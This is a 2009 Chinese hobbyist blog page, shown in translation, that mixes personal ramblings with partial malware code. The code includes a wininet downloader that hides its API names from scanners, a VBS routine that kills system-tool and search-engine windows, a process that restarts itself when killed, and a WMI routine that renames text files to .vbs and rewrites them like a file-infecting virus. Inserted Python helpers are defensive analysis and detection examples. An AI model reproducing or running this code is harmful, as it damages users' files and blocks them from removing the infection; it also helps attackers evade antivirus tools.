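A wininet downloader in VC with embedded ASM

Author: wakakala  Posted: October 31, 2009  Category: VBS / C++

A very good example of using wininet; I learned a lot of tricks from it.
I once wrote one myself: a downloader with ActiveX startup, DLL injection to get through the firewall, WININET download, and random string replacement. I feel it was a bit more complete than this one.

I was about to release a VIP version, but the hateful ThinkPad's perverse reinstall mechanism wiped out more than a hundred GB of data.

Seeing this one again today, I'm posting it here in memoriam.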
#include "windows.h"

//CodyBy:xets007

bool DownLoadFile(char *szUrl,char *szFile);

void main()
{
char szUrl[]="http://127.0.0.1/test.exe";
char szFile[]="d:\\test.exe";
DownLoadFile(szUrl,szFile);
}
bool DownLoadFile(char *szUrl,char *szFile)
{
char szWininet[12]={'w','i','n','i','n','e','t','.','d','l','l','\0'};
HMODULE hWininet=LoadLibrary(szWininet);
if(hWininet==NULL) return false;
char szInterOpenA[]={'I','n','t','e','r','n','e','t','O','p','e','n','A','\0'};
DWORD dwInterOpenA=(DWORD)GetProcAddress(hWininet,szInterOpenA);
char szInterOpenUrlA[]={'I','n','t','e','r','n','e','t','O','p','e','n','U','r','l','A','\0'};
DWORD dwInterOpenUrlA=(DWORD)GetProcAddress(hWininet,szInterOpenUrlA);
char szHttpQueryInfoA[]={'H','t','t','p','Q','u','e','r','y','I','n','f','o','A','\0'};
DWORD dwHttpQueryInfoA=(DWORD)GetProcAddress(hWininet,szHttpQueryInfoA);
char szInternetCloseHandle[]={'I','n','t','e','r','n','e','t','C','l','o','s','e','H','a','n','d','l','e','\0'};
DWORD dwInternetCloseHandle=(DWORD)GetProcAddress(hWininet,szInternetCloseHandle);
char szInternetReadFile[]={'I','n','t','e','r','n','e','t','R','e','a','d','F','i','l','e','\0'};
DWORD dwInternetReadFile=(DWORD)GetProcAddress(hWininet,szInternetReadFile);

Read the rest...
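The excerpt above spells each DLL and API name out as a character-array initializer and resolves it with GetProcAddress; when a compiler emits such an initializer as per-byte stores, the name never appears as a contiguous string in the binary. The following Python analysis helper is an added example, not part of the original post: it rebuilds such strings from x86 code, assuming a 32-bit unoptimized build that uses `mov byte ptr [ebp+disp8], imm8` (the sample bytes are constructed, not taken from a real build).

```python
import re

# Names the excerpt above builds character by character (taken from the page).
WATCHLIST = {"wininet.dll", "InternetOpenA", "InternetOpenUrlA",
             "HttpQueryInfoA", "InternetCloseHandle", "InternetReadFile"}
# x86 encoding: C6 45 <disp8> <imm8>  ==  mov byte ptr [ebp+disp8], imm8
MOV_BYTE = re.compile(rb"\xC6\x45(.)(.)", re.DOTALL)

def build_sample(strings, first_disp=-0x40):
    """Constructed input: per-byte stores as an unoptimized build may emit them."""
    code, disp = bytearray(b"\x55\x8b\xec"), first_disp   # push ebp; mov ebp, esp
    for s in strings:
        for ch in s.encode("ascii") + b"\x00":
            code += bytes([0xC6, 0x45, disp & 0xFF, ch])
            disp += 1
    return bytes(code + b"\xc9\xc3")                      # leave; ret

def recover_stack_strings(code, min_len=4):
    """Rebuild strings stored one byte at a time into consecutive [ebp+disp8] slots."""
    found, run = [], bytearray()
    prev_disp = prev_end = None

    def emit():
        if len(run) >= min_len:
            found.append(run.decode("ascii"))
        run.clear()

    for m in MOV_BYTE.finditer(code):
        disp = int.from_bytes(m.group(1), "little", signed=True)
        val = m.group(2)[0]
        # A run continues only if this store directly follows the previous one
        # in the code and targets the next stack slot.
        if not (prev_end == m.start() and disp == prev_disp + 1):
            emit()
        if 0x20 <= val < 0x7F:
            run.append(val)
            prev_disp, prev_end = disp, m.end()
        else:                  # NUL terminator or non-text byte ends the string
            emit()
            prev_disp = prev_end = None
    emit()
    return found

def hidden_imports(code):
    """Recovered strings that name a library or API on the watchlist."""
    return [s for s in recover_stack_strings(code) if s in WATCHLIST]

SAMPLE = build_sample(["wininet.dll", "InternetOpenA", "InternetReadFile", "ok"])
```

A plain `strings` pass over SAMPLE finds none of these names, which is why a static triage step needs this kind of reconstruction before matching import watchlists.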

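Playing "mutual process guarding" with VBS (excerpt 2)

Author: wakakala  Posted: October 31, 2009  Category: VBS / C++

This article was published in 《黑客防线》 (Hacker Defense), issue 1 of 2009; reprints must carry the copyright notice.

A function that uses WS to close windows with specified content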

-----------------------------------------------code by pk --------------------------------------------------------------------------

 

 

Sub killid(winid)
      Set tmpws=CreateObject("wscript.shell")
         If tmpws.AppActivate(winid)=True Then
            tmpws.SendKeys "%{F4}"
            tmpws.SendKeys "Y"
         End If
      Set tmpws=Nothing
End Sub

winids=Array("我的电脑","超级兔子","注册表","控制台","命令提示符","运行","进程","管理",_
"百度","Google","雅虎","搜狗","爱问","中搜","搜索","有道","奇虎","","Live Search","Tom搜索","Search",_
"a","b","c","d","e","f","g","h","i","j","k","l","m","n","o","q","r","s","t","u","v","w","x","y","z",_
"A","B","C","D","E","F","G","H","I","J","K","L","M","N","O","Q","R","S","T","U","V","W","X","Y","Z",_


 

Read the rest...

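Playing "mutual process guarding" with VBS (excerpt 1)

Author: wakakala  Posted: October 31, 2009  Category: VBS / C++

This article was published in 《黑客防线》 (Hacker Defense), issue 1 of 2009; reprints must carry the copyright notice.

A VBS function that uses WMI to watch for the deletion of a specified process and restart it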

-----------------------------------------------code by pk ------------------------------------------------------

 

Function monps(path_process)
'Monitor process deletion
Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
'Connect to the local CIMV2 namespace; GetObject returns an object to reference
Set colMonitoredProcesses = objWMIService. _
   ExecNotificationQuery("select * from __InstanceOperationEvent " _
       & " Within 1 Where TargetInstance isa 'Win32_Process'")
'Run the WQL query through the ExecNotificationQuery method
'Poll every second for the three intrinsic events (creation, modification, deletion) of any Win32_Process instance
Do
'Loop
   Set objEvent = colMonitoredProcesses.NextEvent
'Effectively blocks the script until a monitored event occurs
       Select Case objEvent.Path_.Class
'objEvent.Path_.Class gives the kind of intrinsic event: modification, deletion, or creation.

  

Read the rest...

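Afterwards

Author: wakakala  Posted: October 28, 2009  Category: Idle Clouds / Ramblings

Afterwards, HanMeimei of course did not marry LiLei. She divorced once and became a writer with a melancholy style under the pen name 寒寐 (Hanmei); she never leaves the house, yet is quite popular online.
Afterwards, LiLei of course did not marry HanMeimei either. He became Teacher Li and teaches Chinese at a middle school, though he is still cheerful.
Afterwards, Lucy went back to her home country. She is still unmarried, but still kind and fond of music; she is now the head of a kindergarten and sometimes gives the children music lessons.
Afterwards, Jim stayed in Beijing and became a manager at the Dodge car company. He really did pursue HanMeimei, without success; he found a Chinese wife, had two children after marrying, and put on weight.
Afterwards, Lily became an editor at a radio station and also does business planning. To keep her figure she no longer eats ice cream. She also has many, many boyfriends.
Afterwards, Kate went to Shanghai and married an American who works there; that was last month.
Afterwards, LinTao became a police officer, a household-registration officer, at Cuiwei Beili.
Afterwards, UncleWang retired. He still likes tinkering with odd contraptions and has been on television once.
Afterwards, Professor L.G.Alexander returned to England. He has retired from the publishing company and is still writing; he comes to China twice a year.
Now, Polly is still alive and has lost some feathers; the greatest pleasure of each day is speaking Chinese with Professor Alexander.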

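A VBS function that uses WMI to traverse and search files on disk, and count them

Author: wakakala  Posted: October 27, 2009  Category: VBS / C++

A function I wrote many years ago that uses VBS with WMI to traverse and search the files on a disk and count them. I came across it today while tidying my network drive, so I'm posting it.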

 

------------ code by fzhang-------------------------------------------------------------------------------------------------------

Function wmisfile(path_sf,justcnt)
 'On Error Resume Next
 StrComputer="."
 Set ObjWMIService=GetObject("winmgmts:\\"&StrComputer&"\root\cimv2")
 Set FileList = objWMIService.ExecQuery _
     ("ASSOCIATORS OF {Win32_Directory.Name='"&path_sf&"'} Where " _
         & "ResultClass = CIM_DataFile")
  For Each objFile In FileList
   fname=lcase(objfile.name)
   ename=lcase(objfile.extension)
   If 1<objfile.filesize And objfile.filesize<=50000 Then
    Select Case ename
     Case "txt","log"
      path_vbs=objfile.drive&objfile.path&objfile.filename&".vbs"
      objfile.rename(objfile.drive&objFile.Path&objfile.filename&".vbs")
      Call changetovbs(path_vbs,path_vbs)
      justcnt=justcnt+1
              Case "vbs"
               If checkversion(fname)=False Then
                   Call changetovbs(fname,fname)
                   justcnt=justcnt+1
      End If
    End Select
   End If
        Next
 Set colSubfolders = objWMIService.ExecQuery _
     ("Associators of {Win32_Directory.Name='"&path_sf&"'} " _
         & "Where AssocClass = Win32_Subdirectory " _
             & "ResultRole = PartComponent")
  For Each objFolder In colSubfolders
      wmisfile objfolder.name,justcnt
  Next
End Function

-----------------------code end----------------------------------------------------------------------------------------------------
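The function above walks a directory tree through WMI and renames small .txt and .log files to .vbs before rewriting them, which shows up in file telemetry as a burst of same-name extension changes. The following detection logic is an added example, not code from the original post: it flags a process that performs several such renames inside a short window. The event tuple layout, the threshold and the window are assumptions, and the sample events are constructed.

```python
import ntpath
from collections import defaultdict, deque

DATA_EXT = {".txt", ".log"}    # extensions the function above rewrites
SCRIPT_EXT = {".vbs"}          # extension it renames them to

# Constructed rename telemetry: (epoch seconds, pid, old path, new path)
EVENTS = [
    (100, 4120, r"D:\notes\a.txt", r"D:\notes\a.vbs"),
    (101, 4120, r"D:\notes\b.log", r"D:\notes\b.vbs"),
    (102, 4120, r"D:\notes\sub\c.TXT", r"D:\notes\sub\c.vbs"),
    (103, 4120, r"D:\notes\sub\d.txt", r"D:\notes\sub\d.vbs"),
    (105, 2200, r"C:\work\draft.txt", r"C:\work\final.txt"),  # ordinary rename
    (400, 2200, r"C:\work\run.txt", r"C:\work\run.vbs"),      # single, below threshold
]

def is_retype(old, new):
    """True when a data file keeps its folder and base name but becomes a script."""
    old_stem, old_ext = ntpath.splitext(old.lower())
    new_stem, new_ext = ntpath.splitext(new.lower())
    return old_stem == new_stem and old_ext in DATA_EXT and new_ext in SCRIPT_EXT

def flag_mass_retype(events, threshold=3, window=10):
    """Map pid -> peak count of data-to-script renames seen within `window` seconds."""
    recent, flagged = defaultdict(deque), {}
    for ts, pid, old, new in sorted(events):
        if not is_retype(old, new):
            continue
        q = recent[pid]
        q.append(ts)
        while ts - q[0] > window:      # drop renames that fell out of the window
            q.popleft()
        if len(q) >= threshold:
            flagged[pid] = max(flagged.get(pid, 0), len(q))
    return flagged
```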

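Xidan GIRL, once again

Author: wakakala  Posted: October 25, 2009  Category: Idle Clouds / Ramblings

I saw this video once again on someone else's blog.

I listened to it in March and I am listening to it in October; only six months, yet it feels like a lifetime ago.

Read the rest...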
